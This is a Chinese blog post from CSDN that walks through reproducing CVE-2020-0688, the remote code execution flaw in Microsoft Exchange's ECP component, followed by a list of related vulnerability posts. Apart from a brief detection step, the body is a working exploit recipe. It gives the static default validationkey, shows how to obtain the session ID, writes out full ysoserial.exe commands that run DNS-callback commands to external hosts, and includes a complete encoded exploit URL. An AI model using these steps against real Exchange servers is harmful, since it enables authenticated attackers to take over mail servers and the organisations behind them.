Exchange-CVE-2020-0688(RCE)

已于 2023-08-29 00:31:50 修改
阅读量588 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 网络安全 web安全
于 2023-08-29 00:31:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/bring_coco/article/details/132550838

漏洞描述

当攻击者通过各种手段获得一个可以访问Exchange Control Panel (ECP)组件的用户账号密码,就可以在被攻击的exchange上执行任意代码,直接获取服务器权限。
CVE-2020-0688也是因为viewstate反序列化

漏洞版本

利用条件:Exchange Server 2010 SP3/2013/2016/2019,普通账号。

漏洞检测

使用ExchangeDetect检测漏洞
在这里插入图片描述
如果存在漏洞, ExitCode 将返回4(具体看readme)
在这里插入图片描述

漏洞利用

条件(4个,其中前三个默认,最后一个获得即可)
validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
validationalg = SHA1
–generator=B97B4E27(基本默认)
–viewstateuserkey = ASP.NET_SessionId(可以通过手工获取变量,也可以通过脚本模拟用户登录获取该值)

generator获得

在这里插入图片描述

获得ASP.NET_SessionId值

直接用户登录之后访问/ecp/default.aspx 界面在header里面获取ASP.NET_SessionId
在这里插入图片描述
ASP.NET_SessionId 0ca11707-28a1-4c97-8a5e-0247c148c524

现在我们已经有了validationkey,validationalg,viewstateuserkey,__VIEWSTATEGENERATOR。就可以用使用YSoSerial.net生成序列化后的恶意的ViewState数据。
利用ysoserial.exe输入如下命令

#书写格式
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping dnslog.cn" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{填入__VIEWSTATEGENERATOR}" --viewstateuserkey="{填入viewstateuserkey,也就是ASP.NET_SessionId}" --isdebug –islegacy

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="0ca11707-28a1-4c97-8a5e-0247c148c524" --isdebug –islegacy

在这里插入图片描述
然后构造url

#url格式
/ecp/default.aspx?__VIEWSTATEGENERATOR={填入__VIEWSTATEGENERATOR}&__VIEWSTATE={填入YSoSerial.net生成的urlencode 过的ViewState}

https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=3111865895&__VIEWSTATE=%2FwEyvAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADeBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BcGluZzwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BInd2ZWRldi5kbnNsb2cuY24iIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs7O0aYxQjiUJjsvMoh3qOcdPpFMA%3D%3D

在这里插入图片描述
没收到请求,因为我的这个版本的exchange 2013 SP没有该漏洞

番茄酱料
关注
Exchange CVE-2020-0688 远程代码执行漏洞
总有人间一两风,填我十万八千梦
05-31 1067
漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器中以SYSTEM权限远程执行代码。使用普通域用户hacker登录管理中心/ecp/,定位到/ecp/,在其响应头中获取ASP.NET_SessionId 的值。攻击者可以在 被攻击的exchange上执行任意代码,直接获取服务器权限。
CVE-2020-0688 exchange远程代码执行漏洞
crowsec
06-01 2407
影响版本: Microsoft Exchange Server 2010 Service Pack 3 Microsoft Exchange Server 2013 Microsoft Exchange Server 2016 Microsoft Exchange Server 2019 漏洞介绍: 所有Exchange Server在安装后的web.config文件中都拥有相同的validationKey和decryptionKey。这些密钥用于保证ViewState的安全性。而ViewSta
CVE-2020-0688_EXP:CVE-2020-0688_EXP自动触发有效载荷和加密方法
03-20
CVE-2020-0688_EXP CVE-2020-0688_EXP自动触发有效载荷 python3 CVE-2020-0688_EXP.py -h usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: http://ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD -c C
cve-2020-0688:cve-2020-0688
03-20
cve-2020-0688 用法: usage: cve-2020-0688.py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: http://ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Password -c CMD, --cmd CMD
Exchange反序列化漏洞复现(CVE-2020-0688
whojoe的博客
06-26 2946
Exchange反序列化漏洞复现(CVE-2020-0688)环境搭建 环境搭建 win2008r2 Exchange2013 下载地址https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=57826
CVE-2020-0688 Exchange RCE 任意命令执行
03-29
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft ...
CVE-2020-0688 Exchange Rce.MD
04-13
CVE-2020-0688 Exchange Rce
CVE-2020-17144 Exchange RCE.MD
04-13
CVE-2020-17144 Exchange RCE
[Timeline Sec] - CVE-2020-16875:Microsoft Exchange RCE复现1
08-03
CVE-2020-16875:Microsoft Exchange RCE复现】这篇文章讲述了Microsoft Exchange Server中存在的一种远程代码执行(RCE)漏洞,该漏洞可能导致恶意攻击者在系统用户上下文中运行任意代码。文章由作者zhang0b@...
【漏洞通告】微软Exchange远程代码执行漏洞(CVE-2020-0688)处置手册
爱国小白帽
02-27 5280
【漏洞通告】微软Exchange远程代码执行漏洞(CVE-2020-0688)处置手册 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 通告编号:NS-2020-0012 2020-02-27 TAG: 微软、Exchange、远程代码执行 危害等级: 高,攻击者利用此漏洞可实现远程代码执行,从而控制Exchange服务器。 应急等级:...
探索CVE-2020-0688Exchange服务器远程命令执行利器
最新发布
gitblog_00039的博客
06-08 468
探索CVE-2020-0688Exchange服务器远程命令执行利器 去发现同类优质开源项目:https://gitcode.com/ 在信息安全领域,漏洞利用是攻防战中不可或缺的一部分。今天,我们要向您推荐的是一款名为cve-2020-0688的开源工具,它专为微软Exchange服务器上的CVE-2020-0688漏洞设计,允许安全研究人员和管理员进行远程命令执行,以便测试和修复系统安全性。...
CVE-2020-0688 Exchange 远程代码执行分析
smellycat000的专栏
03-01 1291
聚焦源代码安全,网罗国内外最新资讯!关于如何利用该漏洞,ZDI的博客中已有介绍。但是关于这个漏洞的细节还未看到有更多的披露。本篇将补充分析该漏洞的细节。01.漏洞简介Microsoft...
【漏洞通告】微软Exchange远程代码执行漏洞(CVE-2020-0688)通告
爱国小白帽
02-26 2861
【漏洞通告】微软Exchange远程代码执行漏洞(CVE-2020-0688)通告 原创 绿盟安全服务部 绿盟科技安全情报 今天 通告编号:NS-2020-0012 2020-02-26 TAG: 微软、Exchange、远程代码执行 危害等级: 高,攻击者利用此漏洞可实现远程代码执行,从而控制Exchange服务器。 应急等级: 黄色 版本: 1.0 1 漏洞概述 北...
〖EXP〗Ladon CVE-2020-0688 Exchange漏洞利用
K8哥哥
07-16 450
洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,这些密钥用于保证ViewState的安全性。而ViewState是ASP.NET Web应用以序列化格式存储在客户机上的服务端数据。 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
登录页面验证管理员身份核心代码_CVE-2020-0688:微软EXCHANGE服务的远程代码执行漏洞...
weixin_39590989的博客
12-06 300
转载:nosec 作者:iso60001本周二,微软发布了一个Important级别的补丁,解决了Microsoft Exchange Server中的远程代码执行错误。此漏洞是由一位匿名研究人员报告给我们的,它影响了Microsoft Exchange Server的所有版本,直到周二的补丁才被修复。下面是这个漏洞的一个快速演示视频:https://youtu.be/7d_HoQ0LVy8最初,...
Exchange Server反序列化漏洞复现(CVE-2020-0688)
谢公子的博客
07-10 2706
漏洞描述: 漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器中以SYSTEM权限远程执行代码。 漏洞影响版本: Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 Microsoft Exchange Serve
CVE-2020-16875:Microsoft Exchange RCE复现
荒野求生的博客
11-19 1552
https://my.oschina.net/u/4593034/blog/4632168 0x01 简介 Microsoft Exchange Server 是个消息与协作系统。Exchange server可以被用来构架应用于企业、学校的邮件系统或免费邮件系统。它还是一个协作平台。你可以在此基础上开发工作流,知识管理系统,Web系统或者是其他消息系统。 0x02 漏洞概述 由于对cmdlet参数的验证不正确,Microsoft Exchange服务器中存在一个远程执行代码...
CVE-2020-17144 Exchange RCE漏洞
谢公子的博客
07-23 3994
目录 漏洞背景 漏洞影响版本 漏洞复现 exp1 exp2 漏洞修复 漏洞背景 在微软最新发布的12月安全更新中公布了一个存在于 Microsoft Exchange Server 2010中的远程代码执行漏洞(CVE-2020-17144),官方定级 Important。该漏洞是由程序未正确校验cmdlet参数引起,经过身份验证的攻击者利用该漏洞可实现远程代码执行。该漏洞和 CVE-2020-0688 类似,也需要登录后才能利用,不过在利用时无需明文密码,只要具备 NTHash 即可。除了
(环境搭建+复现)CVE-2021-26855 2021年3月 Exchange Server RCE 复现
daxi0ng的博客
03-16 7854
0x00 简介 Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。 0x01 漏洞概述 CVE-2021-26855 该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。 危害:该漏洞是Exch
CVE-2020-0688漏洞深度分析与防范
CVE-2020-0688是一个在2020年发现的安全漏洞,它影响了微软的Exchange服务器软件,这是一个广泛使用的邮件和日历服务器解决方案。Exchange服务器广泛部署于企业环境中,用于提供电子邮件、日历、联系人和任务管理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值